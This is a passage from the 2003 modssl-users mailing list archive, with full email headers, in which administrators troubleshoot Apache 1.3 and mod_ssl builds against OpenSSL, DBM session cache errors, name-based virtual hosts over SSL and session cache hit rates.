> >>       apache  1.3.27    built from RH 7.3 spec non-compiler 
> >> with changes
> >>       mod_ssl 2.8.14    built from RH 7.3 spec non-compiler 
> >> with changes
> >>                         also tried 2.8.12
> >>       openssl 0.9.6b-33 as provided by RH.  It's sometime 
> around the
> >>                         upgrade here that things went 
> kablooey.  Was
> >>                         using -31 and -29.  Tried all revs 
> back to -18
> >>                         without success.
> >> 
> >>    I built the first two using gcc 3.2-7, glibc-2.3.2-4.80.4.  
> >> 
> >Speaking personally I avoid compiling programs whenever I 
> can. A few years
> >ago I had no choice but to compile Apache, but now I stick 
> to the Red Hat
> >packages (one of our systems needs a one line patch, but 
> even then that is
> >built into a new RPM package). There are so many kludges 
> within Red Hat's
> >version of openssl I wouldn't try to build one (they remove patent
> >restricted code, so what you build will break sendmail, 
> openssh and nearly
> >all your email programs). The sonames don't match up to what 
> openssl creates
> >either.
> >
> >That's why I'd say you are best off going back to the 
> openssl RPM version
> >that Red Hat supply. In addition, you might want to check 
> that you have the
> >openssl-devel package installed (as you can use that to 
> build mod_ssl and
> >apache against).
> >
> >I'll probably get flamed now...
> >
> >John
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 18:17:48 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 259782AA033; Tue,  8 Apr 2003 18:17:48 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from utility.invlogic.com (utility.invlogic.com [198.182.196.8])
	by master.modssl.org (Postfix) with ESMTP id 705812AA01F
	for ; Tue,  8 Apr 2003 18:17:46 +0200 (CEST)
Received: from os2.invlogic.com (mmclagan@os2.invlogic.com [198.182.196.9])
	by utility.invlogic.com (8.12.9/8.12.9) with ESMTP id h38GHhTG010551
	for ; Tue, 8 Apr 2003 12:17:43 -0400
Message-Id: <200304081617.h38GHhTG010551@utility.invlogic.com>
From: "Michael McLagan" 
To: "modssl-users@modssl.org" 
Date: Tue, 08 Apr 2003 12:17:43 -0400 (EDT)
X-Mailer: PMMail 2.20.2382 for OS/2 Warp 3.0
In-Reply-To: <9B66BBD37D5DD411B8CE00508B69700F033F28E1@pborolocal.rnib.org.uk>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: RE: SSL connections stopped working :(
X-Envelope-Sender: 
X-Envelope-Source: 198.182.196.9
X-Scanned-By: MIMEDefang 2.31 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael McLagan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 8 Apr 2003 16:36:02 +0100, John.Airey@rnib.org.uk wrote:

>When you say that the system says you have 6h, where is that coming 
from?
>I've just checked on a test Red Hat 8.0 server I have here, and I get 
the
>following:
>
>[jairey@ginger jairey]$ openssl
>OpenSSL> version
>OpenSSL 0.9.6b [engine] 9 Jul 2001
>OpenSSL> exit
>
>Thanks.

John,

   I thought I saw it in an Apache response or error log as part of the 
startup but I wouldn't swear by it.  Everything here says 0.9.6b now that 
I go looking for it.

   Michael


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 18:51:10 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id ACFE72AA033; Tue,  8 Apr 2003 18:51:10 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from utility.invlogic.com (utility.invlogic.com [198.182.196.8])
	by master.modssl.org (Postfix) with ESMTP id 1972D2AA01F
	for ; Tue,  8 Apr 2003 18:51:09 +0200 (CEST)
Received: from os2.invlogic.com (mmclagan@os2.invlogic.com [198.182.196.9])
	by utility.invlogic.com (8.12.9/8.12.9) with ESMTP id h38Gp7TG003798
	for ; Tue, 8 Apr 2003 12:51:07 -0400
Message-Id: <200304081651.h38Gp7TG003798@utility.invlogic.com>
From: "Michael McLagan" 
To: "modssl-users@modssl.org" 
Date: Tue, 08 Apr 2003 12:51:06 -0400 (EDT)
X-Mailer: PMMail 2.20.2382 for OS/2 Warp 3.0
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: SSLEngine on -- not working?
X-Envelope-Sender: 
X-Envelope-Source: 198.182.196.9
X-Scanned-By: MIMEDefang 2.31 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael McLagan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

   In this saga of trying to figure out what's going on with our SSL 
setup here, I tried to access port 443 with telnet and with lynx using 
http on port 443.  Both produced appropriate apache log & output results 
for a standard http port!  I was expecting the "Trying to talk HTTP to an 
HTTPS port" error message.

   Our config has always looked like:

      
         
            SSLCertificateFile    ~/cert
            SSLCertificateKeyFile ~/key
            SSLEngine on
         
      

   I thought the IfModule might be the problem so I commented it out and 
left the SSL commands intact.  When I load/add the SSL module, I get no 
errors but no SSL functionality.  When I don't load/add SSL, apache 
complains about unknown directives and refuses to start.  Clearly it's 
being loaded and it's processing the config options but it doesn't seem 
to be intercepting traffic.

   Anybody seen anything like this?  I'm wide open to suggestions, I've 
already spent 3 days on this to no avail! :(

   Michael


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 19:00:25 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 9DFDE2AA039; Tue,  8 Apr 2003 19:00:25 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id DFA2D2AA024
	for ; Tue,  8 Apr 2003 19:00:23 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id C81EA6E401E; Tue,  8 Apr 2003 19:00:20 +0200 (CEST)
Date: Tue, 8 Apr 2003 19:00:20 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: SSLEngine on -- not working?
Message-ID: <20030408170020.GA22436@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <200304081651.h38Gp7TG003798@utility.invlogic.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <200304081651.h38Gp7TG003798@utility.invlogic.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Apr 08, 2003 at 12:51:06PM -0400, Michael McLagan wrote:
> Hello,
> 
>    In this saga of trying to figure out what's going on with our SSL 
> setup here, I tried to access port 443 with telnet and with lynx using 
> http on port 443.  Both produced appropriate apache log & output results 
> for a standard http port!  I was expecting the "Trying to talk HTTP to an 
> HTTPS port" error message.
> 
>    Our config has always looked like:
> 
>       
>          
>             SSLCertificateFile    ~/cert
>             SSLCertificateKeyFile ~/key
>             SSLEngine on
>          
>       
> 
>    I thought the IfModule might be the problem so I commented it out and 
> left the SSL commands intact.  When I load/add the SSL module, I get no 
> errors but no SSL functionality.  When I don't load/add SSL, apache 
> complains about unknown directives and refuses to start.  Clearly it's 
> being loaded and it's processing the config options but it doesn't seem 
> to be intercepting traffic.
> 
>    Anybody seen anything like this?  I'm wide open to suggestions, I've 
> already spent 3 days on this to no avail! :(
> 
There's nothing in the error_log? I would definetely suggest using the full
file path instead of ~/cert and ~/key.
Are you sure this isn't wrapped in something like ?

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 19:18:40 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 8322B2AA033; Tue,  8 Apr 2003 19:18:40 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from utility.invlogic.com (utility.invlogic.com [198.182.196.8])
	by master.modssl.org (Postfix) with ESMTP id C34552AA024
	for ; Tue,  8 Apr 2003 19:18:38 +0200 (CEST)
Received: from os2.invlogic.com (mmclagan@os2.invlogic.com [198.182.196.9])
	by utility.invlogic.com (8.12.9/8.12.9) with ESMTP id h38HIYTG020313
	for ; Tue, 8 Apr 2003 13:18:36 -0400
Message-Id: <200304081718.h38HIYTG020313@utility.invlogic.com>
From: "Michael McLagan" 
To: "modssl-users@modssl.org" 
Date: Tue, 08 Apr 2003 13:18:33 -0400 (EDT)
X-Mailer: PMMail 2.20.2382 for OS/2 Warp 3.0
In-Reply-To: <20030408170020.GA22436@toftum.dk>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
Subject: Re: SSLEngine on -- not working?
X-Envelope-Sender: 
X-Envelope-Source: 198.182.196.9
X-Scanned-By: MIMEDefang 2.31 (www . roaringpenguin . com / mimedefang)
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Michael McLagan" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, 8 Apr 2003 19:00:20 +0200, Mads Toftum wrote:

>There's nothing in the error_log? I would definetely suggest using the full
>file path instead of ~/cert and ~/key.

There are no messages in /var/log/httpd/error other than nice happy
startup messages.

I do have full paths, I just changed it for the email (lazy, security).

>Are you sure this isn't wrapped in something like ?

Definitely.  I don't use IfDefine anywhere and I commented out the 
IfModule to see if things worked better.

   Michael


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Apr  8 22:56:30 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1BEF92AA033; Tue,  8 Apr 2003 22:56:30 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.byte-productions.com (mail.byte-productions.com [63.144.102.40])
	by master.modssl.org (Postfix) with SMTP id 112472AA01F
	for ; Tue,  8 Apr 2003 22:56:26 +0200 (CEST)
Received: (qmail 32382 invoked from network); 8 Apr 2003 20:56:32 -0000
Received: from unknown (HELO byteme.byte-productions.com) (63.149.22.66)
  by mail.byte-productions.com with SMTP; 8 Apr 2003 20:56:31 -0000
Received: (from ken@localhost)
	by byteme.byte-productions.com (8.11.6/8.11.6) id h38KuM126142
	for modssl-users@modssl.org; Tue, 8 Apr 2003 16:56:22 -0400
Date: Tue, 8 Apr 2003 16:56:21 -0400
From: Ken Schweigert 
To: modssl-users@modssl.org
Subject: mod_ssl Builds Against Uninstalled OpenSSL Version [long post]
Message-ID: <20030408165621.I948@byte-productions.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5.1i
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ken Schweigert 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Bottom line up front:  How do I find out which openssl library apache and
mod_ssl are building with?  Even though I tell it to use 0.9.7a it still
builds agains 0.9.6c.

History:
I'm trying to fix a "Cannot store SSL session to DBM file" error I've been
getting since I upgraded to mod_ssl-2.8.14-1.3.27 and I thinking it must
be because an old version of OpenSSL is still somewhere on the system.

This is the error I see in error_log when someone makes a secure connection
the the webserver:

[Tue Apr  8 16:13:43 2003] [error] mod_ssl: Cannot store SSL session to DBM file `/usr/local/apache/logs/ssl_scache' (System error follows)
[Tue Apr  8 16:13:43 2003] [error] System: Invalid argument (errno: 22)

Apache reports the version of OpenSSL as 0.9.6c:
[23/Mar/2003 08:32:48 02173] [info]  Server: Apache/1.3.27, Interface: mod_ssl/2.8.14, Library: OpenSSL/0.9.6c

My configure statment specifically calls to OpenSSL 0.9.7a:
[root@www apache_1.3.27]# more go-apache2.sh 
EAPI_MM="/usr/local" SSL_BASE="/usr/src/APACHE-1.3.27/openssl-0.9.7a" \
./configure --enable-shared=max \
--enable-module=ssl \
--enable-module=access \
...

The output from configure:
[root@www apache_1.3.27]# ./go-apache2.sh 
Configuring for Apache, Version 1.3.27
 + using installation path layout: Apache (config.layout)
Creating Makefile
Creating Configuration.apaci in src
Creating Makefile in src
 + configured for Linux platform
 + setting C compiler to gcc
 + setting C pre-processor to gcc -E
 + checking for system header files
 + adding selected modules
    o rewrite_module uses ConfigStart/End
 + using -lndbm for DBM support
      enabling DBM support for mod_rewrite
    o ssl_module uses ConfigStart/End
      + SSL interface: mod_ssl/2.8.14
      + SSL interface build type: DSO
      + SSL interface compatibility: enabled
      + SSL interface experimental code: disabled
      + SSL interface conservative code: disabled
      + SSL interface vendor extensions: disabled
      + SSL interface plugin: Built-in SDBM
      + SSL library path: /usr/src/APACHE-1.3.27/openssl-0.9.7a
      + SSL library version: OpenSSL 0.9.7a Feb 19 2003
      + SSL library type: source tree only (stand-alone)
 + enabling Extended API (EAPI)
   using MM library: /usr/local (installed)
 + using system Expat
 + using -ldl for vendor DSO support
 + checking sizeof various data types
 + doing sanity check on compiler and options
Creating Makefile in src/support
Creating Makefile in src/regex
Creating Makefile in src/os/unix
Creating Makefile in src/ap
Creating Makefile in src/main
Creating Makefile in src/modules/standard
Creating Makefile in src/modules/ssl
[root@www apache_1.3.27]#

Everything builds fine except when I try to verify the OpenSSL version
with 'strings' it finds v0.9.6c somewhere on my system:

[root@www ssl]# strings libssl.so |grep OpenSSL
OpenSSL
Spurious SSL handshake interrupt[Hint: Usually just one of those OpenSSL confusions!?]
OpenSSL
OpenSSL
 (System and OpenSSL library errors follow)
 (OpenSSL library error follows)
OpenSSL
OpenSSL 0.9.6c 21 dec 2001
[root@www ssl]#

I grabbed this while apache was building/making:

gcc -L/usr/src/APACHE-1.3.27/openssl-0.9.7a -shared -o libssl.so mod_ssl.lo ssl_engine_config.lo ssl_engine_compat.lo ssl_engine_ds.lo ssl_engine_dh.lo ssl_engine_init.lo ssl_engine_kernel.lo ssl_engine_rand.lo ssl_engine_io.lo ssl_engine_log.lo ssl_engine_mutex.lo ssl_engine_pphrase.lo ssl_engine_vars.lo ssl_engine_ext.lo ssl_scache.lo ssl_scache_dbm.lo ssl_scache_shmht.lo ssl_scache_shmcb.lo ssl_expr.lo ssl_expr_scan.lo ssl_expr_parse.lo ssl_expr_eval.lo ssl_util.lo ssl_util_ssl.lo ssl_util_sdbm.lo ssl_util_table.lo  -lssl -lcrypto -L/usr/lib/gcc-lib/i386-redhat-linux/2.96 -lgcc 

If I understand it correctly, the -lssl option to gcc links in libssl.a  If I
do a 'locate' for libssl.a and run strings against those files, they all
show 0.9.7a in them
[root@www apache_1.3.27]# locate libssl.a
/usr/local/ssl/lib/libssl.a
/usr/src/openssl-0.9.7a/libssl.a
/usr/src/APACHE-1.3.27/openssl-0.9.7a/libssl.a

[root@www apache_1.3.27]# locate libssl.a | awk '{print "strings " $1 "|grep -i openssl"}' | /bin/bash
SSLv2 part of OpenSSL 0.9.7a Feb 19 2003
OpenSSLDie
OPENSSL_cleanse
OpenSSLDie
OpenSSLDie
OPENSSL_cleanse
OPENSSL_cleanse
SSLv3 part of OpenSSL 0.9.7a Feb 19 2003
OPENSSL_cleanse
OPENSSL_cleanse
SSLv2/3 compatibility part of OpenSSL 0.9.7a Feb 19 2003
TLSv1 part of OpenSSL 0.9.7a Feb 19 2003
OPENSSL_cleanse
OpenSSL 0.9.7a Feb 19 2003
OpenSSLDie
OPENSSL_cleanse
OPENSSL_malloc Error
OpenSSLDie
SSLv2 part of OpenSSL 0.9.7a Feb 19 2003
OpenSSLDie
OPENSSL_cleanse
OpenSSLDie
OpenSSLDie
OPENSSL_cleanse
OPENSSL_cleanse
SSLv3 part of OpenSSL 0.9.7a Feb 19 2003
OPENSSL_cleanse
OPENSSL_cleanse
SSLv2/3 compatibility part of OpenSSL 0.9.7a Feb 19 2003
TLSv1 part of OpenSSL 0.9.7a Feb 19 2003
OPENSSL_cleanse
OpenSSL 0.9.7a Feb 19 2003
OpenSSLDie
OPENSSL_cleanse
OPENSSL_malloc Error
OpenSSLDie
SSLv2 part of OpenSSL 0.9.7a Feb 19 2003
OpenSSLDie
OPENSSL_cleanse
OpenSSLDie
OpenSSLDie
OPENSSL_cleanse
OPENSSL_cleanse
SSLv3 part of OpenSSL 0.9.7a Feb 19 2003
OPENSSL_cleanse
OPENSSL_cleanse
SSLv2/3 compatibility part of OpenSSL 0.9.7a Feb 19 2003
TLSv1 part of OpenSSL 0.9.7a Feb 19 2003
OPENSSL_cleanse
OpenSSL 0.9.7a Feb 19 2003
OpenSSLDie
OPENSSL_cleanse
OPENSSL_malloc Error
OpenSSLDie

This feels like I'm overlooking something obvious, but I can't figure out what.

Can anyone help?

-- 
Ken Schweigert, Network Administrator
Byte Productions, LLC
http://www.byte-productions.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  9 09:20:08 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 17C5F2AA033; Wed,  9 Apr 2003 09:20:08 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id B3D1A2AA019
	for ; Wed,  9 Apr 2003 09:20:06 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 9F4EB6E401E; Wed,  9 Apr 2003 09:20:01 +0200 (CEST)
Date: Wed, 9 Apr 2003 09:20:01 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: mod_ssl Builds Against Uninstalled OpenSSL Version [long post]
Message-ID: <20030409072001.GA14911@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <20030408165621.I948@byte-productions.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20030408165621.I948@byte-productions.com>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Apr 08, 2003 at 04:56:21PM -0400, Ken Schweigert wrote:
> Bottom line up front:  How do I find out which openssl library apache and
> mod_ssl are building with?  Even though I tell it to use 0.9.7a it still
> builds agains 0.9.6c.
> 
ldd libexec/libssl.so if you have built using dso.

> History:
> I'm trying to fix a "Cannot store SSL session to DBM file" error I've been
> getting since I upgraded to mod_ssl-2.8.14-1.3.27 and I thinking it must
> be because an old version of OpenSSL is still somewhere on the system.
> 
I doubt that.

> This is the error I see in error_log when someone makes a secure connection
> the the webserver:
> 
> [Tue Apr  8 16:13:43 2003] [error] mod_ssl: Cannot store SSL session to DBM file `/usr/local/apache/logs/ssl_scache' (System error follows)
> [Tue Apr  8 16:13:43 2003] [error] System: Invalid argument (errno: 22)
> 
This more looks like a problem with the dbm library instead - looking through
the output of configure, I see that apache is picking up NDBM while mod_ssl
decides to use SDBM.
I can see that you're also installing MM shared memory support, why not use
an shm based session cache? Performance should be better than dbm.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  9 09:24:24 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id E67912AA039; Wed,  9 Apr 2003 09:24:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from multimat.temp.veriohosting.com (multimat.temp.veriohosting.com [128.121.231.95])
	by master.modssl.org (Postfix) with ESMTP id 2D3102AA020
	for ; Wed,  9 Apr 2003 09:24:22 +0200 (CEST)
Received: from messagev9u4h93 (slip139-92-146-236.ehn.de.prserv.net [139.92.146.236]) by multimat.temp.veriohosting.com (8.12.6p2) id h397O6YD075454 for ; Wed, 9 Apr 2003 01:24:11 -0600 (MDT)
From: "Spock" 
To: 
Subject: Question about using modssl with Name Based Virtual Hosts
Date: Wed, 9 Apr 2003 09:23:43 +0200
Organization: MessageVine Inc.
Message-ID: <000201c2fe68$fa063580$ec925c8b@messagev9u4h93>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0003_01C2FE79.BD952000"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2627
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Spock" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0003_01C2FE79.BD952000
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Hi
 
I understand that NBVH cannot be used in combinationi with SSL in order
to perform the initial SSL handshake. However, does this really prevent
me from defining NBVH for use at later stages in apache processing? For
example, let's assume I want two NBVH with two different FQDNs, on the
same IP, using port 443 - and I want both to use the same server
certificate, but I want them to use different other settings
(DocumentRoot, logging settings, etc.).
 
I would imagine the main problem in this case was making sure that the
single server certificate is compatible with both FQDNs, but assuming
that can be arranged via wildcards - will this work? Does anyone know of
any limitations to this (for example, things that definitely cannot work
this way)?
 
Thank you,
 
Yair Halevi (Spock)
Chief Technology Officer
MessageVine
www.messagevine.com
email: spock@messagevine.com
Tel:   +972-3-5479996 ext. 119
Fax:   +972-3-5474827
Cel:   +972-54-776300
 
 

------=_NextPart_000_0003_01C2FE79.BD952000
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable























Hi



 



I understand that NBVH cannot be used in combinationi
with SSL in order to perform the initial SSL handshake. However, does =
this
really prevent me from defining NBVH for use at later stages in apache
processing? For example, let’s assume I want two NBVH with two =
different FQDNs, on the same IP, using port 443 – and =
I want
both to use the same server certificate, but I want them to use =
different other
settings (DocumentRoot, logging settings,
etc…).



 



I would imagine the main problem in this case was =
making
sure that the single server certificate is compatible with both FQDNs, but assuming that can be arranged via =
wildcards
– will this work? Does anyone know of any limitations to this (for
example, things that definitely cannot work this =
way)?



 



Thank you,



 



Yair Halevi (Spock)

Chief Technology Officer

MessageVine

www.messagevine.com

email: spock@messagevine.com

Tel:   +972-3-5479996 ext. 119

Fax:   +972-3-5474827

Cel:   +972-54-776300



 



 









------=_NextPart_000_0003_01C2FE79.BD952000--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  9 15:37:20 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 126E82AA033; Wed,  9 Apr 2003 15:37:20 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from qeo02001.t-online.net (fw08.t-online.net [212.185.46.120])
	by master.modssl.org (Postfix) with ESMTP id A2F8F2AA019
	for ; Wed,  9 Apr 2003 15:37:16 +0200 (CEST)
Received: from qeo09161.de.t-online.corp (qeo09161 [192.168.248.161])
	by qeo02001.t-online.net (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id PAA25071
	for ; Wed, 9 Apr 2003 15:37:15 +0200
X-Authentication-Warning: qeo02001.t-online.net: Host qeo09161 [192.168.248.161] claimed to be qeo09161.de.t-online.corp
Received: from qeo00200.de.t-online.corp ([192.168.195.200]) by qeo09161.de.t-online.corp with Microsoft SMTPSVC(5.0.2195.5329);
	 Wed, 9 Apr 2003 15:37:11 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.6334.0
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Subject: Need to know hit rate of ssl session cache
Date: Wed, 9 Apr 2003 15:37:10 +0200
Message-ID: <60F1F87A64834D45A1EBAE9618305FB8025244E2@qeo00200>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Need to know hit rate of ssl session cache
Thread-Index: AcL+nR8yZ7MUYWplEdeTdwACsyarwQ==
From: "Courtin, Bert" 
To: "Modssl-Users (E-Mail)" 
X-OriginalArrivalTime: 09 Apr 2003 13:37:11.0379 (UTC) FILETIME=[1FA17230:01C2FE9D]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Courtin, Bert" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi list,

maybe this has already discussed elswhere but I didn't find appropriate =
information...

What I need to know is the "hit rate" of the ssl session cache =
respectively a way to calculate it myself based on information from the =
ssl*.log files, if possible.

In other words: How can I tell for a connection in the log files whether =
a ssl-handshake was done or whether the session could have been "reused" =
from the ssl session cache?

I would appreciate any help or information that points me in the right =
direction.


Kind regards,

B. Courtin=20
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Apr  9 15:43:43 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 463822AA033; Wed,  9 Apr 2003 15:43:43 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 3C8DE2AA019
	for ; Wed,  9 Apr 2003 15:43:42 +0200 (CEST)
Received: by toftum.dk (Postfix, from userid 1001)
	id 629236E401E; Wed,  9 Apr 2003 15:43:41 +0200 (CEST)
Date: Wed, 9 Apr 2003 15:43:41 +0200
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Need to know hit rate of ssl session cache
Message-ID: <20030409134341.GC15657@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <60F1F87A64834D45A1EBAE9618305FB8025244E2@qeo00200>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <60F1F87A64834D45A1EBAE9618305FB8025244E2@qeo00200>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Apr 09, 2003 at 03:37:10PM +0200, Courtin, Bert wrote:
> Hi list,
> 
> maybe this has already discussed elswhere but I didn't find appropriate information...
> 
> What I need to know is the "hit rate" of the ssl session cache respectively a way to calculate it myself based on information from the ssl*.log files, if possible.
> 
You should raise SSLLogLevel to get that info - iirc you need either 
debug or trace, but try it out - see
http://www.modssl.org/docs/2.8/ssl_reference.html#ToC20

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Apr 10 01:02:29 2003
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
